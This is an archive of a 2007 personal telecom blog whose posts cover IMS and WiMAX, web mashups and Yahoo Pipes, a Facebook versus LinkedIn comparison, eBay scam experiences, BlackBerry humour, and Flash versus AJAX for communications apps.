Search This Blog

Sunday, December 23, 2007

Will there be such a thing as a hardphone?

At one of the panels that I participated in at VON Fall 2007, we pesented our opinions on "Will there be such a thing as a hard phone". The Panel had interesting representations from Plantronics, Adobe, Ayalogic and others in addition to mine. Naturally, this is not directly related to IMS, but speaks more of 'service convergence' and whether there will be radical form factor changes to what we know as a phone today. My slides are available here

Friday, September 14, 2007

My presentation at the Internet Telephony on IMS, WiMAX and all thingsnice



I spoke at the Internet Telephony conference in Los Angeles last week on IMS, hWiMAX, how they all work together (or not) and what it really means to applications. You can see a copy here

Tuesday, September 4, 2007

Speaking at Internet Telephony and our latest IMS report


Hi folks,
My apologies for the lack of postings. It just so happens that Sep/Oct/Nov are the worst three months for travel for me. I have been on the road for most part of this month and will be all over the map till the end of November.If any of you are going to be at the Internet Telephony Conference in LA, I hope to see you there. I will be speaking on Monday about "IMS vs. WiMAX" there. So if you are attending, would be good to meet. On another note, I've been speaking and attending at the Internet Telephony show for several years now, and I must say, Rich Tehrani and the team has done a great job over the years in being innovative. For this show, as an example, they have come out with innovative interviews, video clips and press releases which help in advertising both their name and the participating company's name. Good on you, Rich! I hope other setups pick up a bit on the ideas these folks have implemented.

On another note, we have just released our July-Aug 2007 IMS Tracking report. You can read an executive brief here.

Thursday, August 16, 2007

LinkedIn vs. Facebook == Vertical vs. Horizontal

There has been a lot of commotion about the newly released Facebook APIs and why it will be replacing linkedin (just google and you would notice many prominent bloggers etc. talk about it).


So of course, I tried it. I use Linkedin a lot.


Recently, I read a specific post by Jeff Pulver saying he is abandoning LinkedIn to go with Facebook.


Naturally, the decision to switch is subjective, but as far as my personal opinion goes, I don't see them as overlapping. Here are a few reasons why:


(Note: all of this is related to using Facebook as a 'BUSINESS networking tool')


  1. Horizontal vs. Vertical: LinkedIn is a 'vertical' tool. It is meant for networking of business professionals for buisness needs. Facebook seems to be a 'horizontal' tool - it allows business networking as well as networking for non-business needs, like say, going for movies, planning a party and what-not.

  2. East is East and West is West: My business life and profile is different from my personal life and profile. I'd love for my buddy to see my mood as 'What the heck is wrong with the world today', but don't see any reason why the same mood needs to be 'exported' to my connected business colleagues

  3. Credibility of network: It seems everyone joins Facebook. Be it a college dude, a stay at home mom or a seasoned professional. By nature, due to the marketing of LinkedIn, it seems to me that mostly business professionals join. Now ask yourselves this "How many invites do you actually reject ?" If the answer is none or close to none, well, then if you want to use Facebook for business referrals, why would you go for a horizontal tool ?

  4. Lack of features a good thing: I am a strong believer that specific relevant features are better than a potpourri of irrelevant features mixed with relevant ones. LinkedIn offers targetted, easy to understand business networking features, such as their Q&A, In Mail, Reccomendation system etc. Facebook, on the other hand has hundreds (thousands?) of plugin applications made by developers, and honestly, I have no idea how one will react till I actually use it. Again, honestly, for business networking you need simplicity and clarity of representation

  5. Clean and relevant interface: Finally, I find the facebook layout to be terribly confusing and dosed with over-information. For example, from a business networking perspective, do I really care to see "Mr. Foo Foo is currently at work" or "Mr. Foo Shoo just added the OhIluvIt application" ?

So net-net, I just don't get why people think facebook will replace LinkedIn as a 'BUSINESS' networking tool. As a 'social' networking tool, sure, I get it.

FaceBook = Linked In (parts) + orkut (parts) + whole bunch of customizable apps

As facebook's website says "Facebook is a SOCIAL utility that connects you with people around you"

Conceptualize your startup in 1 minute


Presenting the most powerful framework for conceptualizing your company.

Credit: here
Source I read it from: here

See this: http://www.tdbspecialprojects.com/

Click on the central 'shuffle' button for 'innovation'.

Thursday, August 2, 2007

When have you just about had enough with the 'Always on' Blackberry?




When do you know you have had enough of ‘always connected Blackberry’ ?

  • When your blinking of the eye matches the rate of the red LED blinking of your Blackberry

  • When you wake up at 2AM to drink water, check your emails instead, then go back to sleep wondering why you are still thirsty

  • When your hand automatically reaches down to your holster because it ‘vibrated’ only to find your phone is in your pocket, or worse, not even with you

  • When you promise your wife not to sit with the laptop all the time only to scroll through your blackberry hidden on the other side of the couch

  • When you like to keep holding your phone because of its ‘warmth’

  • When you make it a point, while traveling, to smile at someone else using a blackberry and then take yours out for a second, polish it an place it back thinking this is some sort of camaraderie of blackberry users

  • When you have spent more money buying ‘screen protectors’, ‘glass replacement screens’, ‘skintight covers’ and other gadgets as compared to the cost of the phone itself

  • When you get withdrawal symptoms if the red ‘new mail’ LED does not start flashing every two minutes

  • When you find yourself opting for a $400 a month blackberry plan which includes unlimited data, unlimited roaming, gazillion calling minutes, ‘just in case you are in the middle of tanganikya and need to make a call home’

  • When you keep checking what is your current GPS location (you know, in the new 8800 series), even though you are sitting in your OWN friggin’ house on your own friggin’ recliner

  • When you loctite glue your blackberry holder clip to your belt, so you never forget to ‘latch on’

  • When your pastime involves how smoothly you can maneuver the ‘pearl’ so that the cursor moves in a nice circle around your icons (applicable only to pearl users)

  • When you own a wall socket charger, a USB charger and a hand-cranked charger for your blackberry to make sure it never runs out of juice

  • When you have downloaded Yahoo Go!, Google Mobile, BBMaps, Telenav, WayFinder and other local search and/or GPS apps and use them ALL for every search, just to see which is better for this particular query

  • When you insist on posting notes/messages from your Blackberry even though you are in front of a computer, because the “Sent via BlackBerry® from Cingular Wireless®” tagline at the end of you message makes you feel sophisticated.

And you think adding ‘Presence’ to such devices will be a success in the consumer market! Ha. Bite me.

(Sent via BlackBerry® from Cingular Wireless®)

Friday, July 20, 2007

Get serious about Mashups "Foo Foo sh*t for college kids"



As part of my job, I get to meet and talk to many talented individuals and a wide variety of customers, ranging from the garage startup that just opened up in Palo Alto to scowly-faced old hodges sitting in dark brown leather chairs who have 3 levels of secretaries you need to weed through for a meeting.

The great part about this is that I get a learn a lot and hear opinions from all sides.

A very good friend of mine recently commented that “talk in his town” about those who kept talking about mashups mean those people are “college kids” doing “foo foo sh*t”. Another good friend of mine in Boston recently commented “Oh, a mashup. Yes, we did one too. They are just toys”.

And I can’t say that I completely disagree with these opinions, even though I personally think there is huge promise in the “core concept” of a mash-up. Everytime anyone mentions “mashup” and “making money”, half the audience in a room inevitably chuckle (about the making money part).

So I compiled a top ten list of how I think mashups should be marketed to cut the hype and get serious:

  1. Give a break to ‘user generated applications’. There is no evil in ‘service provider hosted applications’ – Mashups are not just great tools for the average joe to slap a great service together. They are equally important for ‘walled-garden’ providers to reduce their own time to market for new services and increase their ‘service attractiveness’

  2. Cut the acronym jargon and talk about core concepts. Mashups is not about “AJAX, Web 2.0, SAAS, DOJO, YUI, GWT”. You don’t need to put them all in one sentence for people to assume you ‘get it’. At the core of ‘mashups’ lie a distributed architecture, based on Web standards, which allow for creating hybrid applications.

  3. Give a break to YouTube, HousingMaps and GoogleMaps. A vast majority of services ‘out there’ are demonstrations on how you can scrape youtube for a filtered playlist, or place markers of some sort on google maps, with HousingMaps constantly being sighted as the “poster boy”. Mashups are equally useful in services that have nothing to do with maps or user videos. For example, how about using a mashup to integrate presence into conferencing (presence enabled auto-dialout of participants)?

  4. Goooooooogle Advertising. I am tired of hearing the eyeballs to revenue story. Think of innovative ways in which you can charge for a service that goes beyond ‘offering it free’ and hoping to make money from advertising. Why can’t you think of a differentiated service plan for accessing some ‘premium’ features of what the mashup provides ? And if you think people will not pay for it, why continue to talk about mashups as a viable business model ? For example, recently, Jeff Pulver’s FWD moved to a split model of free calls and paid for services. Now if Jeff were to add presence based dialing out to premium callers, that would be a valid business model, wouldn’t it ?

  5. Not just the browser. People keep touting that Mashups and browsers have an exclusive license to speak. Not true. A mashup can be rendered on any ‘User Agent’ that is compatible with the web standards required for the mashup. And this can also be local thick applications ! Every time someone mentions ‘browsers’ I see the entire mobile value chain of ISVs and OEMs cringe.

  6. Stop talking about ‘Web 2.0izing’ your world. What the bleeding hell does that mean anyway? Think about what value you are trying to bring using a mashup. Are you trying to create a platform where 3rd party video/voice/content can be integrated, say, using a common template language (like Google Mashup Editor for instance) for quicker development of services ? Say so. Are you trying to re-use other platforms and use their data to create your own service without the need to host the other data you are accessing? Say so. Any of this is better than saying “I am Web 2.0izing”

  7. Read about licenses before you talk about building “commercial” applications using ‘free’ platforms. I’ve seen many cases of eager engineers make great pitches about how he thinks he could create a service using Google or Yahoo platforms (pipes, gme etc.) without ensuring that these platforms allow for ‘free commercial usage’ (they sure allow free personal usage). Not understanding the legal limitations on 3rd party tools is embarrassing.

  8. The ‘bridge’ approach is better than the ‘build a new planet’ approach. If you are a firm believer in the Internet and mashup model, you don’t need to be a hater of all things legacy. People don’t ‘over-haul’ their lives, nor user experience expectations. People prefer to ‘change them incrementally’ for the better. So think of ways in which your mashup can make an experience better for an existing service that the user may be using (a bridge to a better way) as opposed to ‘throw your $30 phone away and buy a $499 iphone so you can run my mashup on their safari browser’)

  9. AJAX and mashups are not the same thing. AJAX is “one” technology (suite of). Mashup is an architectural concept. Besides AJAX there are other technologies such as Flash which a better suited for several environments (including mobile applications, including streaming related mashups). So don’t continue to needlessly bundle them together in concept and ‘market talk’ unless your product is doing that (special note to analysts here, who talk about the market)

  10. Patience. Build it. Business plan. Build it.

Sunday, July 8, 2007

EBAY and Trust



don't claim to be a heavy eBAY user. But, I do buy and sell stuff occasionally and my recent experience selling stuff on eBAY could be a good indicator of what is probably worrying the execs of EBAY: Managing scale.For the past month or so, I've been trying to sell a laptop on eBAY. I've listed the items two times already and here is what happened both times:

1. Within hours of listing, I get sent messages of two categories: People who want to cheat the sytem and barter offline and scammers with manufactured or stolen eBAY identities who want the "usual" information. I spend valuable time dutifully forwarding it to the security folks at eBAY.

2. During the weeklong listing, I spend even more time responding to form responses from eBAY and handling email discussions with CallCenter agents who plainly have no expertise in managing security.

3. During the last day or two of the auction, I will have three or four genuine buyers who I communicate with and keep engaged.

4. During the last minutes, I see bidding begin and notice my genuine buyers being beaten by scammers with stolen identities win the auction with outrageous bidding. I cannot do anything. Things move at the speed of the Internet!

5. I then get a "Congrats" email followed by a "sorry, the scammers beat us" email and to protect the integrity of the network (read: eBAY probably doesn't want this information getting public) the entire listing is removed.

This got me thinking and I've come to the following conclusions that you might or might not agree with:

- E-Commerce is now no different than regular commerce. An Internet business will initially probably have advantages due to the network effect, but in the end they will end up just like the other utilities: they will struggle to manage scale and offer a compelling service. My eBAY experience was no different than calling my telephone or cable company: Form responses, casual processes to address core business competencies, and frustrating customer service.

- Internet establishments will progressively develop a tiered system. The big customers will get all the attention and the small/occasional customers will not be able to take any advantage of the benefits the network provides. It won't be egalitarian like it used to.

- Secure E-Commerce is elusive. Internet businesses who depend on earning money through customers they trust will struggle to keep their infrastructure secure. There is a constant struggle between expanding the user base and offering a secure environment. There has to be a better way than the best computer scientists being routinely defeated by the dolts with a phone and a laptop from the most "backward" regions of the world.

eBAY is probably the most innovative of Internet businesses. Their annual report proudly states:


Our purpose is to pioneer new communities around the world built on commerce, sustained by trust and inspired by opportunity.

If eBAY is struggling to sustain trust, I shudder to think what the industry is going through. I am sure there is a venture opportunity in all of this! Know of any?


Tuesday, June 5, 2007

The Value of SIP/Presence to RSS: A new world of Mashup Editors



I keep telling folks around me that in this new world, "code complexity" is not the engineer's archetypal org*sm. It is "idea innovation". Those who still love dreaming about complex call control and the sorts will progressively slide down the bell curve of the future.

First there was Yahoo Pipes - a great new 'tool' to allow developers to build on existing web resources and create a chained service by piping RSS feeds. Now, there is Google Mashup Editor (GME), Google's response to the innovation shown by the Yahoo team. Frankly, GME takes 'mashup' creation a notch higher. By exposing a programmable interface and letting us chain RSS feeds and link it to HTML, CSS and Javascript code, Google has effectively allowed us much more creativity, including service form factor (how it will look). This is truly the beginning of web 2.0 based Service Creation Environments and is a place to watch.

But anyway, how about the following service:

'Trackit' is a presence publishing system that allows different Presentities to update their presence state periodically. Presentities that publish their state also specify access rules which govern who can read this presence. Pete is a paid subscriber to 'Trackit' and decides to offer a 'Map & Track' service on top of Trackit and GoogleMaps like so:Users who use Trackit can now use Pete's service, where they can track each other's presence location and presence state on google's scrolling maps. And this is just the beginning. Later, Pete decides to also add traffic information on the map, so users can not only see each other's location and presence sate, but also traffic in that area (So Mary knows Joe is 2 miles away, and is in heavy traffic)

Now what if all of this could be done in 10-15 lines of code by Pete ? This is made possible by the fantastic new generation tools like GME. What is missing now, is mapping the SIP presence state of the users into an RSS feed, so that 3rd party developers can continue to use the existing framework to integrate relevant SIP state into their mash applications.
Motivated by this concept, I wrote up this Internet Draft titled "Motivation for RSS Feed for Presence State". Take a look and comment, if you'd like.

Abstract:

RSS Feeds have always played an important role in providing userscontent related updates typically of Websites without having to visit those websites manually. Typical examples of RSS usage include users 'subscribing' to the RSS feed of a website, say, CNN.com andthereby automatically receiving 'news headlines' then the contentchanges. Recently, there have been significant innovations (such asYahoo Pipes and Google Mash-up Editor) where RSS feeds fromdifferent sources have been combined to produce new services in a'Web Based Service Creation Environment' model allowing users tocreate interesting services building on top of 'primitives' that canbe represented on the Web.This document describes the motivation for an RSS feed for Presenceinformation, which the authors believe would be useful to create newservices using a similar environment described above.

In short, SIP goes far beyond voice. SIP has a wealth of information in it which adds a very rich dimension to creating combined services. I could go on and on with other examples, but not in this post.

And here is a demo of the Trackit service in the draft, written in GME:

Try it out:

http://rsspresence.googlemashups.com/

Screen shot: (GME does not yet allow the mashups to be listed on external sites)

Saturday, June 2, 2007

License plate reading with Google Street Views



Everytime I wonder if there is anything left to do on these new generation of scrollable maps by Google and Yahoo, one of them surprise me. The latest is the neat addition of Google Maps street view (here) where you can see real street images and navigate around.

But the level of detail captured is, well, um, surprising. See for example a car that was parked on the street on one of their street maps. I can easily read the license plate even without enhancing. But see the enhanced image too - no special tools - just some sharpening and saturation. Infact, the image was so readable, I masked a part of it with a black box in this version.



At this level of detail, for all those folks doing things you should not be, watch out, you are on a world-wide candid camera :-)



(click on image for larger view)

Tuesday, May 29, 2007

IMS: Ideal Architecture for Quadruple Play for Operators


The July 2007 IEC publication, titled "Beyond the Quadruple Play: Networking, Convergence, and Customer Delivery" will feature an article I wrote on behalf of my company which talks about why I think IMS is the ideal architecture for such a network.


The download link to the paper is here (Sorry for the indirections, but as I said, I am liberally going to promote my official blog here to - don't complain - you ain't paying *grin* )


Abstract:

Broadband IP is a great leveling ground when it comes to converged services being offered by multiple providers. For example, with the availability of Broadband, companies such as Vonage could offer IP based phone replacement solutions threatening the turf of established phone operators. Similarly, Comcast can now suddenly offer Cable VoIP (phone service) and Verizon can now suddenly offer TV services over IP, thereby threatening each in service areas that were traditionally never their turf. Broadband IP has also enabled ‘new kids on the block’ like Skype, Joost and others to offer bundled services that threaten the trillion dollar communications industry as we know it. This is one main reason why carriers are competing to stay alive with “Quadruple Play” blended services that offer Voice, Video, Data and Wireless accessibility into one.

However, providing Quadruple-Play across heterogeneous networks (WiMAX, DSL, Cable, cellular etc.) is a non-trivial task and one needs a robust and well thought out architecture which ensures that services can be provisioned and provided uniformly to subscribers in a way that lends to seamless user experience and operator provisioning/charging and billing.

This paper describes the merit of IMS (IP Multimedia Subsystem) - an over-arching

architecture specification that enables uniformed IP based service delivery over diverse network types (WiFi, DSL,WiMAX, Cellular technologies etc.) as the ideal architecture for operators to deliver Quadplay services to their users.

Monday, May 14, 2007

New IMS blog

Folks, I just wanted to let you know that my company has started a new IMS blog. This is part of our overall IMS consulting services. For now, you will find common posts, so please don't panic and press the plagiarize button. Both blogs are controlled by me, and I will continue to cross-post as I see fit. The company blog, however, may have some additional posts related to our IMS Standards Tracking package or other such stuff.

Tuesday, April 24, 2007

Wireless vs. Wired


A colleague had emailed me this simple image a while back. They say sometimes an image can be worth a thousand words. I thought this image powerfully depicts the engineering challenges that lie behind making wireless networks 'work well'.

(I have no idea about the original source of the image, so if someone knows, please email it and I'd be happy to post credits).


Monday, April 23, 2007

IMS deployments - on the rise and around the corner


Are you surprised by the title? Well, that is really how I see things as it stands today. Based on my discussions with most OEMs and ISVs who have themselves been trialing all over the world for a few years now, we are just about at the phase when most trials are getting out into real deployment. Incidentally, incase you think that IMS all-IP ‘live’ deployments have not yet happened, think again. Remember, in 2006, there was an announcement that Wateem Telecom selected Motorola for a wimax deployment ? Well, that network does data and is ready for voice. Not sure if you knew, but that entire network is over an IMS subsystem (yes, you guessed it – WiMAX on its own is not a session specific architecture, while IMS is, so it makes sense to have IMS on WiMAX, huh ?). And yes, I mean R5+, which is all IP for both signaling and media.

Several green field operators are already deploying or have deployed IMS driven networks (we work with many of them), but very few are touting the IMS name around right now, since IMS has been a long used, much abused and somewhat delayed technology. But make no mistake, IMS powered networks are on the rise. Based on my discussions with several players, IMS deployments are on a steep rise, partly also due to ongoing WiMAX trials. It is worthy to note that most of the WiMAX trials today are to do with ‘high speed data’ and not voice. In other words, WiMAX as it stands today, and defined by WiMAX Forum is only at the IP-CAN level – all the blazing speed for an internet connection. But not voice calls, voice features or the other session level services. And please, don’t tell me “why do we need anything? P2P solves everything!”. Well it doesn’t. You need centralized services for technical and non-technical reasons. For example:

a) Technical: How on earth you do reliably implement a voice mail system and retrieve it when a person is offline ? What happens if the peer node who stored your VM is offline when you come online ?
b) Technical: How do you implement feature interaction ? (example A forwards to B to C, but by mistake C sets a forward to A) since in a P2P network no one has an idea of what service the other has provisioned
c) Technical: How do you implement dial-plans?
d) Non-Technical: What do you do if your “spectrum provider” (you know, in a wireless world, someone is paying for expensive spectrum) blocks VoIP ?

And again, this goes back to my original statement I had made in an earlier post – “IMS is the only architecture that is out there today which supports mobile, fixed and nomadic networks” from a session, policy and interworking perspective. Admittedly some of these areas are still ‘in progress’ from a standards perspective, but it’s the farthest out there in terms of maturity. It was also good to know that Verizon has decided to open up A-IMS and push it to standards bodies. A lot of vendors and operators have done good (but till date proprietary) work on enhancing IMS and filling in gaps, so it is good to see it get more public.

And finally, if you are wondering about my post because you hardly hear IMS being talked about today, this is because we are in the stage between “Hype is Over” to “Deployment is reality”. Here is how is describe it to many:

Friday, April 13, 2007

Everyone wants to be a YouTube




My apologies for not posting for a while. Besides my own family needs, I’ve been also travelling a lot the past few weeks and visited the usual shows like VoN, CTIA and others. (In fact, Jeff managed to catch me at his show here – I’m the one with the widest grin).

It is always interesting to see what is the next big thing that is there in everyone’s mind. And it is no surprise when I say it is now, “Media”.

A lot of my good friends have either started their own “Media” companies, want to start their own Media company, have started and have changed their business plan thrice already, or are hobnobbing with content producers and aggregators to see if it makes sense for them to start their own media company.

And I use the term “media” in the loosest possible way, because so do they. What they want to do ranges from “Video Streaming” to “Digital conversion” to “lifestyle content” and what-not.

I spent a full day at the CTIA’s Mobile Billboard event, where folks from AMP’D, MTV, Atlantic Records et al came in and spoke about how they view the next decade of media, and I always like listening to their opinions, since they have been in media for a long time, as opposed to us telecom gear-heads who think media is as simple as building a switch.

And as usual, I have my own opinions and thoughts for those in the ‘build a media company’ as well as the ‘mobile content’ fray:

  • It was interesting to note that in the mobile world, people are used to paying for content while the desktop world is littered with ‘free to use – we make money with ads’ schemes. It was fascinating to hear Bill Stone, CEO of AMP’D talk about how AMP’D ARPU is over $100 these days where people are happily paying for polished episodes to be telecast to their phones (They call it mobi-sodes). An interesting side effect of this is that mobile TV is a really cheap way to get into TV broadcasting without the huge costs. Take AMP’Ds relationship with Comedy Central – lil bush was such a success that Comedy Central signed up with them to broadcast the serial on TV as well. AMP’D did not have to pay the millions required to try and enter through traditional broadcast TV media

  • I am personally petrified with the ‘eyeballs to revenue’ business strategy. And that is simply because I’ve seen that to be the primary cause of the 2000’s dot com burst. If you are thinking of opening up such a company, I’d love to see you have a real business plan. It is just my gut feel that one good way would be not to ignore the mobile world. Instead, try and enter the mobile space first with targetted solutions and then spread to the desktop world, and not the other way around. I just think there are too may strong players in the pure desktop market for VoD, IPTV and similar solutions including Google, Fox, Joost, etc.


  • Building a Video/Audio/TV streaming product is not just about slick interfaces. I'm getting a little tired at companies focussing on slick interfaces and oomph factors at the UI level and focussing less on what matters more - non jittery video feed, good lip synching and good caching, effective CPU utilization while making sure my dual core CPU is not choking itself to death

  • You won’t believe how many people think they need to build their own overlay architecture to provide solid video streaming quality. I don’t think that’s a bad thing, but I am yet to see a good quality overlay network. I’ve used Joost too, and I think it’s quality is no better than many others I've tried. I’d strongly suggest people to look at re-using well established content caching infrastructure like those provided by Akamai and Limelight.

  • User generated vs. professionally generated content: It was interesting to hear that atleast in the mobile space, all the content providers today seem to feel there is little or no market for user-generated amateur content. Instead, they strongly believe people will continue to watch professionally created content and that the mobile medium is unlike the desktop medium where user-generated Youtube content is widespread (but again, would you be willing to pay to watch a video some teen created, and if not, how will anyone except Google actually make money ?)

  • I am really against those who are trying to replicate the ‘desktop’ environment on your mobile. Sorry, but I’ve been long playing with content-adaptations and virtual screens for mobile, where the effort is to make your mobile screen as rich as your desktop. I just don’t buy it. Let’s face it, the form-factor is different, the MMI is different and the needs are therefore different. No matter how hard adaptive browsers try (like Opera Mini), it is impossible to effectively predict what is relevant and what is not. I’d much rather have a clean and intuitive interface for the mobile, and I don’t think it should be the same. Which is why I am a supporter of the .mobi movement. Trying to retro-fit two different MMIs (Man-Machine interfaces) together is painful. That is not to say I am against making mobile interfaces more powerful – I am all for it. But make it more powerful to what is relevant to a mobile MMI. On the same lines, I am a little distressed about the new Google and Yahoo mobile search adaptations. Their focus seems to completely be on 'reduced clicks'. Well, besides 'reduced clicks' the next, and if not more important factor is also 'reduced scrolling'. In the effort to produce maximum information with minimum clicks, both these solutions put in lots of gunk on the screen (if I type "web 2.0" it will not only search on the net, but also local, images and the rest). Not fun.

  • Getting bought out as the only exit strategy is scary. In this new content/media space, very few are looking at scaling. Most seem to be interested in getting around a million ‘eyeballs’ and then are hoping to get bought out by the biggies like Google, Yahoo, AOL, and the rest. First, there is a very small chance that you will actually get bought out, and an even smaller chance that you will get bought out for a profitable amount. This directly ties in to your expected revenue model. If you cannot figure out a mechanism where you will get paid per subscriber, you likely have a hard to win model in the long run.

Tuesday, February 27, 2007

BLISS -- Service Interoperability


Those of you who have been in the industry long enough know that the vision of SIP is not fully realized because of interop issues between vendors with the most basic of business telephony features.


There have been various efforts by industry groups like the SIP Forum and individual vendor initiatives like Sylantro usually results in competitor comments about the implementation being proprietary, etc. The back-and-forth understandably keeps going on. This ends up frustrating customers and end users.


There is hope finally! The SIP chairs have now decided to tackle this services interoperability issue head-on by getting together a BOF called BLISS. The name is apt and I would strongly recommend that any of you who are in the industry support this initiative and actively participate in the discussion.


Saturday, February 24, 2007

Off for a few weeks


Hi Readers,

Just a short post to let you know that this blog just may be quiet for the next few weeks (hopefully shorter). I am in the process of discovering how lovely yet strenous it is to manage our newborn son :-)



A Note to my friends from Russia: Thanks for your email - I apologize for not having responded yet - I will certainly put some thought on your questions and write back by next week.

Thursday, February 15, 2007

Lemonade 2.0



(c) Corporaterat (please retain copyright if you copy)

Oh just a cartoon. Sometimes, I get the itch to draw.

Tuesday, February 13, 2007

Indexing should get smarter for bloggers




There are several reasons why Bloggers post. A part of it, I believe, is to share technology and for many, including me, it is a great tool to meet like minded technology people, who often respond by private email. But, I'd be willing to go out on a limb and state that the biggest reason most bloggers blog is that they like to have a podium to talk and be heard, albeit virtually. This also means, therefore, that a vast majority of the bloggers (including me) are 'hitcounter'
maniacs. We love to log in and see how high up our 'hit count' is for the day, and who referred to us. There. I said it. Nothing wrong with it. I love what I call 'ego searching'. It's not a term I invented. PhpBB forums have used this term for many years.

And this is where I think major search engines like Google and Yahoo can do a better job. See, both of them give you an option for either searching within other blogs (who in the blogosphere links to you) or the whole web. The former is limited while the latter is problematic.

Let me explain. There is a difference between adding an analytics tool to your site vs. searching for who links to you. The latter is a superset of the former. The analytics tool will catch referrers (assuming they are not locked) only if the referring site results in a click to your site.

I often use Google Webmaster tools and Yahoo Siteexplorer to see 'Inlinks'. And the problem is that every time someone popular links to this blog, the links go for a toss.

Take for instance, a couple of days ago, Jeremy Zawodny linked to one of the pipes I created with Yahoo Pipes. Admittedly, I haven't been reading too many blogs in the search engine world, but it seems Jeremy's blog is heavily read and linked, so that in turn resulted in a good surge of hits to my site. I think that is fantastic. But here is the rub, when some post gets added to a person's blog-roll or a sidebar and the blog re-published, both Goog and Y! assume that every page in their blog that shows the same sidebar naturally must refer to me as well. Net result, I get 100s or 1000s of 'false inlinks' as I call it. This happened before as well, with another site who had added me to their blogroll and I saw 100s of false-positives. Well, they are not really false-positives - since it is a sidebar, it does actually link to my site, but search engines should be smarter while indexing and do a little better with this.

Suggestions:
1. add a voluntary tag which bloggers can put into 'sidebar' or 'blogroll' entries like , say, "indexOnce" which means even though this part of every page, it does not mean everypage is talking about it.

2. Get a little smarter at the indexing as well.

Monday, February 12, 2007

Burn those virtual calories



"Please change MOV AX,0 to XOR AX,AX. You save bytes. Also, please use shift operators instead of divisions. You save on cycles"


Common speak during the days of DOS and protected mode coding – when C and ASM worked hand in hand.

Then came the ‘abstract high level programmers’ who never really cared about declaring an int where only a byte is needed, or use multiple structs where a union would suffice.
Then came the ‘Object Oriented’ programmers who never really cared for understanding how virtual functions really worked or how they affected performance and/or size and used it pretty much everywhere without blinking an eye.
Then came the visual programmers who would love to drag and drop ‘graphic objects’ that would increase productivity by 150% and reduce time to market by 300% ! Woo haa. It’s another matter that each ‘visual object’ generated 300-500 lines of gob.
Then there was XML & buddies – the whoopie-doo do it all markup language for representing anything.
And DHTML and Javascript to add funky effects and client side programming to increase ‘web interface coolness’.
Then came the idea of using the Internet for communications !
Then came SIP, a great text based protocol, which generates anything between 500-1000 bytes for each message that passes to and fro, with the capacity of ‘adding more as it goes along the network’
Then came ambitious vendors who stuffed ‘SIP’ with a gazillion features like X-Vendor-Header:my.state=park.activate or X-Vendor-Header: (actual JPEG thumbnail here!) which generated anything between 1000-8000 bytes per message !
Then came the world of AJAX with a gazillion websites blindly embedding large JS ‘libraries’ to provide fancy effects.
Then came the first level of convergence – chat & email together ! see this
Then came RIA – combining funky web stuff with cool VoIP stuff- all on the internet – IPTV, VoD, and all the fun things.
Then came an abundance of soft-phones like Skype. Eat up as much memory as you can give it. Infact, I even talked to another vendor in a similar business and he said "Who cares! add more memory!"

Whoopie-Do. Who cares about size, right ? Broadband Rocks. CPU power is king.

Then came the problem of deploying all of the above en-masse.

XML led to Binary-XML. It was felt that for many applications, the XML schema definition itself far exceeded the content it was carrying.
Then came JSON, the ‘fat-free’ alternative to XML
Then came SIGCOMP, a mechanism to ZIP SIP, so to speak, so that it could be used effectively for mobile networks.
Also came the call by the SIP authors to stop using it as a protocol to carry anything under the sun.
Then came the call by AJAXers to have browsers ‘do more stuff’ so they don’t have to pass large libraries around with each page.
Then came reports for first IPTV deployment. Performance mostly sucks.
Then people started complaining about soft-phones eating up every inch of their precious memory and network bandwidth. (Gee, so people really care for memory, it seems)
Then a few months ago, I was taking to a friend who plans to revolutionize the IP-video market by doing things no one is concentrating on today.
“How?” I asked naively.
“We are writing optimized device drivers in assembly and C to ensure that we get the most out of CPU performance, reducing our client size by half to ensure better processing time, (amongst other things)”.

“But.. But.. Broadband! Visual Programming ! I sputtered in rage”

The network speed and CPU power are no excuse for optimization. Burn those virtual calories.

Saturday, February 10, 2007

Just a reminder


Dear Readers,

just a couple of notes:

1. For all those who are subscribed to my feed via email, please ensure that you have verified your email. When you subscribe via email, feedburner will send you an email to verify your address. If you have not received and acted upon the email, you will not get my feed delivered. I see a good number of people in the 'unverified' state, so please check your status. Also note that the 'feed by email' is sent out at 9AM each day, if there was a new feed before that. So it is not instantaneous (I don't control it - feedburner works that way)

2. My feed should now be working properly, ordered the right way, thanks to the wonders of Yahoo Pipes - I simply created a pipe to sort blogger feed by published date and use that as a feed to feedburner. What a great tool, this Yahoo Pipe. So for all those who were affected by the mess before, despair no more !

Friday, February 9, 2007

Piping Hot: Are VoIP bloggers really original?





Are VoIP/Convergence/Telecom/SIP bloggers really original or do they just keep picking up posts from each other?

Let's have some fun. I wrote up a Yahoo Pipe (What?? you don't know what they are??) that compares the feeds from:
      Then filter them for voip/convergence related posts, then selects only those that after analysis seem unique, sorts 'em and then creates a new feed just for you.
      Check it out here and see what happens when the above four blogs are put to the 'copycat' test :-)
      I applaud the Yahoo team for coming out with such a great tool to let users apply diverse data into a personalized flow. Raw Data becomes useful information, only when you provide the right means to personalize them.
      (Disclaimer: This post is just an excuse for me to test Yahoo Pipes - a very very nice new concept in personalized aggregation. It is not really meant to discover if we are all original or not - so don't complain if you think the algorithm for originality is rubbish!)
      For a more serious example of how it helps, remember my earlier post where I was complaining that the new blogger beta was sorting feed by update date not published date, and this resulted in old posts showing up for all my readers even if I fixed a typo? Yahoo Pipes solves it so simply - all I had to do was create a new pipe with a 'fetch' for my blogger feed and then sort it by published date and then export that feed to my feedburner input. Simple huh ?
      Or, take another little more complicate example, where in addition to providing site feed, I show how to also add another feed attribute which shows who all links to each post.
      Note: Yahoo Pipes is very slow after launch. Yahoo says too many people are overloading it - they hope to get better in a few days, so if you see no output of my pipe, run it again !

      Thursday, February 8, 2007

      Web 2.0: The machine is us/(ing us)


      A friend of mine passed on this great video at YouTube by Michael Wesch (Assistant Professor of Cultural Anthropology, Kansas State university). I also noticed that Alec Saunders has it on his page too, so it looks like this video is making the rounds.

      I thought it was simply fantastic. A tip of the hat to Professor Wesch and his team. Enjoy.
      (Keep your speakers on).

      And then, once it excites you, how about diving into some details of web 2.0 :-)

      Wednesday, February 7, 2007

      Flash vs. AJAX – Which to choose for Internet Based Communications ?


      There is no dearth of articles on the internet about the virtues of Flash over AJAX or the other way around. Arguments range from “proprietary plugin vs. open solution”, “performance vs. bandwidth”, “download size”, “availability of skillset”, “security” and much more. However, the focus of my topic is very specific. What is the right RIA platform/technology to use for ‘Internet Based Communications’ related development ?
      In Summary,if you want your product be successful in the market in 2007-2010 and if you need real-time voice, video and animation Flash may be a better choice today. If you need to support mobile clients, stick with Flash. AJAX is great for semi-realtime solutions like IM chats, Web Based Desktop experience, document collaboration etc. Infact, I blogged about it’s promise earlier. But not for voice/video/animation intensive operations.

